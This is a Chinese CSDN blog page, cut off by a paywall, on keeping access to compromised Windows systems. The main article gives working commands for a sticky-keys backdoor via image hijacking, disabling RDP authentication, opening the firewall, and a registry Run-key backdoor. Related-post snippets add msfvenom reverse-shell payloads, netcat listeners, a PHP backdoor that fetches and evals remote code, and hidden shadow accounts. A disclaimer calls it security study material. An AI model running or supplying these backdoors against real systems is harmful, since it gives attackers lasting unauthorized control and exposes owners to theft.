权限维持:常用后门

最新推荐文章于 2023-03-15 10:45:06 发布
最新推荐文章于 2023-03-15 10:45:06 发布
阅读量1.5k 收藏 3
点赞数
分类专栏: Metasploit 文章标签: microsoft windows 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f_carey/article/details/122010357
版权
本文档详述了多种Windows系统权限维持的后门技术,包括粘滞键后门、注册表后门、计划任务后门、WMI型后门和WEB后门。粘滞键后门通过注册表映像劫持实现,计划任务后门利用schtasks和PowerSploit创建Payload,WMI后门特点在于无文件和无进程。同时,文章提供了防御措施,如删除WMI恶意条目。
摘要由CSDN通过智能技术生成

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

权限维持:常用后门

配合 Windows 提权文章

1 粘滞键后门

1.1 粘滞键

windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键是为了一次只能按一个键的人设计的,如按 ctrl+c/v 等组合的键时,就可以单按 5 下 shift 键来启动粘滞键功能,多个组合键就可以依次单个按下来实现,如复制,就可以先按一下 ctrl,然后再按一下 c 即可,这就是粘滞键功能。

1.1.1 设置粘滞键后门

通过注册表来实现,整体的方法思路就是通过修改注册表的映像劫持和打开其远程桌面来实现。

什么是映像劫持,简单理解就是当自己打开程序 a 的时候,实际上是打开的程序 b。这个功能是 windows 自带提供给一些开发调试软件用的,但常常也被恶意的病毒木马利用,比如我们要记录的当打开粘滞键 setch 的时候却打开了 cmd。

# 在注册表的 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ 位置添加被劫持的程序
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
# reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。
# Image File Execution Option 用来设置镜像劫持命令中的 sethc 粘滞键程序
# /v 指定键名,这个键名 debugger 是固定的
# /t 来指定类型,即 REG_SZ 字符串类型
# /d 来指定键的值,即被恶意替换的程序,此处为 cmd程序。

# 把远程桌面链接的用户鉴定选项设置为关闭状态
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0

# 把远程桌面连接的安全层设置为 0
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

1.2 配置开启远程桌面连接

# 配置防火墙允许远程桌面连接
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
# 设置注册表允许远程桌面连接
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

image-20211213212930504

1.3 详细建议阅读此处文章

2 注册表后门

2.1 系统命令 reg

在普通用户权限下,将后门程序或脚本路径填写到注册表键 HKCU:Software\Microsoft\Windows\CurrentVersion\Run 中,当管理员登录系统时,后门就会运行。

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\user01\Desktop
最低0.47元/天 解锁文章
f_carey
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网权限维持 —— 后门
战神/calmness的博客
12-09 1163
目录 操作系统后门 粘滞 注册表注入 计划任务 meterpreter Cymothoa WMI型 web 后门 Nishang 下的webshell weevely webacoo ASPX meterpreter PHP meterpreter 域控制器权限持久化 DSRM 域后门 SSP 维持域控权限 SID History 域后门 Golden Ticket Silver Ticket Skeleton Key Hook PasswordChangeNot
windows/android后门维持
qq_2411772106的博客
08-09 595
搭建环境:kali linux,MSF windons后门维持 // 先创建一个后门payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe // 打开msf控制台,并完成相关设置 msfconsole use exploit/multi/handler set payload windows/meterpr
Android后门GhostCtrl,完美控制设备任意权限并窃取用户数据
weixin_33676492的博客
07-19 236
Android系统似乎已经成为世界各地病毒作者的首选目标,每天都有新的恶意软件在感染更多的设备。 这一次,安全公司趋势科技发布警告,他们发现了一个新的Android后门——GhostCtrl GhostCtrl被发现有3个版本,第一代窃取信息并控制一些设备的功能,第二代增加了更多的功能来劫持设备,第三代结合了早期的版本特性,功能更加强大,...
权限维持——获取登陆账号及安装后门程序
cxrpty的博客
03-12 855
当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门维持权限,达到持续控制的目的。 实验一:获取windows系统登录账号 实验环境:windows2008 windows系统登陆账号存储位置:C:\Windows\System32\confi...
权限维持-影子用户后门
god_Zeo的安全博客
10-12 280
0x00 前提 水一篇内网东西,主要针对一种情况:抓到 hash 解不开, 又不想 pth, 就想直接登桌面 0x01权限维持-影子用户后门 影子账户,古老但有效! 原理 代 $ 符号的用户名不会显示出来,仔通导出注册表,并修改F值,克隆账号,再删除账号 效果 net user无法删除,需要删除注册表相关值; Windows 的登录界面不显示该用户信息。 0x02 简单实用 ShadowUser.exe admin administrator 可以正常登录,桌面什么也是克隆的administrat
后渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4397
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右—>权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
linux权限维持.pdf
03-31
利用系统配置进行权限维持也是攻击者常用的方法之一。攻击者可能修改系统服务或应用的配置文件,为未来的访问留下后门。例如,配置一个Web服务器的Apache或Nginx,通过配置文件添加一个管理入口或者修改cron作业,...
Windows常见的几种权限维持
hackzkaq的博客
05-24 1688
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
backdoor:后门调试的微型工具
07-13
后门 Backdoor.js 是一个简单而有用的的微型助手。 在某个函数作用域中创建一个后门,然后访问该作用域或其父作用域中可用的对象。 $ npm install backdoor 你可以通过 npm 和 require('backdoor') 安装它,或者在你的节点应用程序或网页中使用它之前将 backdoor.js 源代码粘贴到某处。
php_backdoor.php
06-11
大马文件
安卓后门工具:backdoor-apk 教程
Sumarua的博客
07-26 7370
文章目录安卓后门工具:backdoor-apk 教程backdoor-apk 下载、安装、使用教程1、下载backdoor-apk2、下载完成后我们进入到其文件目录下:3、在当前目录下,我们可以看到一个脚本文件。4、Android清单权限选项:如何判断后门APK是否生成 成功?5、成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:6、同时,我将生成的带有后门的 AP
后门查杀1
wrypot的博客
03-15 346
下载下来是这样的,我们先用火绒查杀一下,打开火绒->病毒查杀->自定义查杀选中要查杀的文件夹。点击详情->查看文件路径->打开include.php。密码就是flag,所以搜pass。
weevely工具使用
淡巴枯的博客
05-23 6723
weevely工具使用 目录一. 关于weevely二. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
PHP Backdoor + Reverse Shell on Vulnerable Website
abg49988的博客
02-01 337
翻译总结自: https://shellgam3.com/2016/07/27/php-backdoor-reverse-shell-on-vulnerable-website/ 扫描Web服务器,爆破常见目录 dirb http://xxxxxxxx proxychains curl -X OPTIONS -vhttp://X.X.X.X/test/ 上面的请求应该是 ...
BackDoor
a1b2c3是弱口令
08-08 1673
题目: 下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。 右,追踪tcp流,发现两个加密后的字符串 对字符串进行base64解密,发现菜刀的特征字符: 解密后是这么一段特征字符: @ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0);if(PHP_VERSION&amp;lt;'5.3.0'...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2871
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
最新webshell大合集
热门推荐
帮助别人等于帮助自己 ——MXi4oyu
09-01 3万+
收集与整理了各种webshell,以便在日后的项目中做Webshell检测训练。 https://github.com/tennc/webshell   各种webshell集合 https://github.com/ysrc/webshell-sample webshell样本 https://github.com/xl7dev/WebShell Webshe
kali linux权限维持,权限维持篇-NC后门
最新发布
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统上维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在Kali Linux中创建NC后门的步骤: 1. 在Kali Linux中打开终端,并输入以下命令来生成一个反向Shell: ``` msfvenom -p cmd/unix/reverse_netcat lhost=<攻击者IP> lport=<攻击者端口> -f raw > nc_backdoor ``` 2. 接下来,使用以下命令将生成的反向Shell作为后门上传到受攻击系统: ``` nc -nv <受攻击系统IP> <受攻击系统端口> < nc_backdoor ``` 3. 等待受攻击系统连接到攻击者的系统,然后使用以下命令打开一个监听器: ``` nc -nlvp <攻击者端口> ``` 4. 当受攻击系统连接到攻击者的系统时,攻击者将获得一个Shell,可以在其中执行任意命令。 请注意,NC后门只是权限维持的一种方法,攻击者可能会使用其他技术来维持其访问权限,因此在Kali Linux中学习权限维持是至关重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值